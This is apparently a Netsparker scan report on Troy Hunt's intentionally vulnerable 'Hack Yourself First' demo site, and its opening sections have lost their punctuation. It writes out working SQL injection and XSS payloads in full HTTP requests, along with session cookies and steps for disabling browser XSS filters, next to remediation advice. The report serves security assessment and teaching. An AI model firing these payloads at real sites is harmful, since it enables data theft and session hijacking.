RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
2.3 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter   Type   Value
orderby     GET    (select convert(int, CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 110922217 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
2.4 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter   Type   Value
orderby     GET    (select convert(int, CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 110922217 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
2.5 /Make/1 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter   Type   Value
orderby     GET    (select convert(int, CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 110922217 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
IMPORTANT: 1 total, 1 confirmed

3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java

External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling

Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.

Chrome
Open command prompt. Go to folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor

Internet Explorer
Click Tools -> Internet Options and then navigate to the Security Tab. Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.

Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED http://hackyourselffirst.troyhunt.com/Search?searchTerm=%2Bnetsparker(9)%2B
Parameters
Parameter    Type   Value
searchTerm   GET    +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
IMPORTANT: 1 total, 1 confirmed

4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML, JavaScript, VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application
- The website can be redirected to a new location, defaced or used as a phishing site

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
1 TOTAL  IMPORTANT
1 CONFIRMED

5 Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact: If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take:
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register  CONFIRMED  http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1 TOTAL  IMPORTANT
1 CONFIRMED

6 Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact: This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take:
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy: Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation: To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login  CONFIRMED  https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
1 TOTAL  IMPORTANT

7 Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.
Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310

7.1 /Make/1  http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000.0
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty:
Request:
